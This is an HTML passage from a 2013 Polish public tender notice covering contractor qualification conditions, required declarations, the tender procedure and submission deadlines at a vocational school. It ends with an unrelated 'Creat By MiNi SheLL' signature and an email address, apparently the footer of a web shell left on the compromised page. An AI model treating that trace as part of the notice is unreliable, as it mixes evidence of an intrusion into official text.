<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli wykonawca wykaże, że w trakcie realizacji zamówienia będzie dysponował osobą posiadającą uprawnienia kierownika budowy do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej oraz kierowników robót do kierowania robotami budowlanymi w specjalności elektrycznej oraz sanitarnej.
Ocena spełnienia tego warunku zostanie dokonana wg formuły spełnia-nie spełnia, na podstawie złożonych wraz z ofertą oświadczeń, o których mowa w pkt 8.1. i 8.2. SIWZ. 
Na spełnienie tego warunku można polegać na osobach zdolnych do wykonania zamówienia innych podmiotów - jeżeli oddają je do dyspozycji wykonawcy na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana wg formuły spełnia-nie spełnia, na podstawie złożonego wraz z ofertą oświadczenia, o którym mowa w pkt 8.1. SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy (wg załącznika nr 1 do SIWZ); Oświadczenie o powierzeniu wykonania części zamówienia podwykonawcom (wg załącznika nr 4 do SIWZ); Oświadczenie o przynależności lub braku przynależności do grupy kapitałowej w zakresie art. 24 ust. 2 pkt 5 ustawy (wg załącznika nr 7 do SIWZ); Wypełniony kosztorys ofertowy wg wzoru zamieszczonym w załączniku nr 9.1 i 9.2.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zsu.osw.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Usługowych w Ostrowie Wielkopolskim, ul. Wolności 12 
pokój 102 (sekretariat) - I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.12.2013 godzina 11:00, miejsce: Zespół Szkół Usługowych w Ostrowie Wielkopolskim, ul. Wolności 12 
pokój 102 (sekretariat) - I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com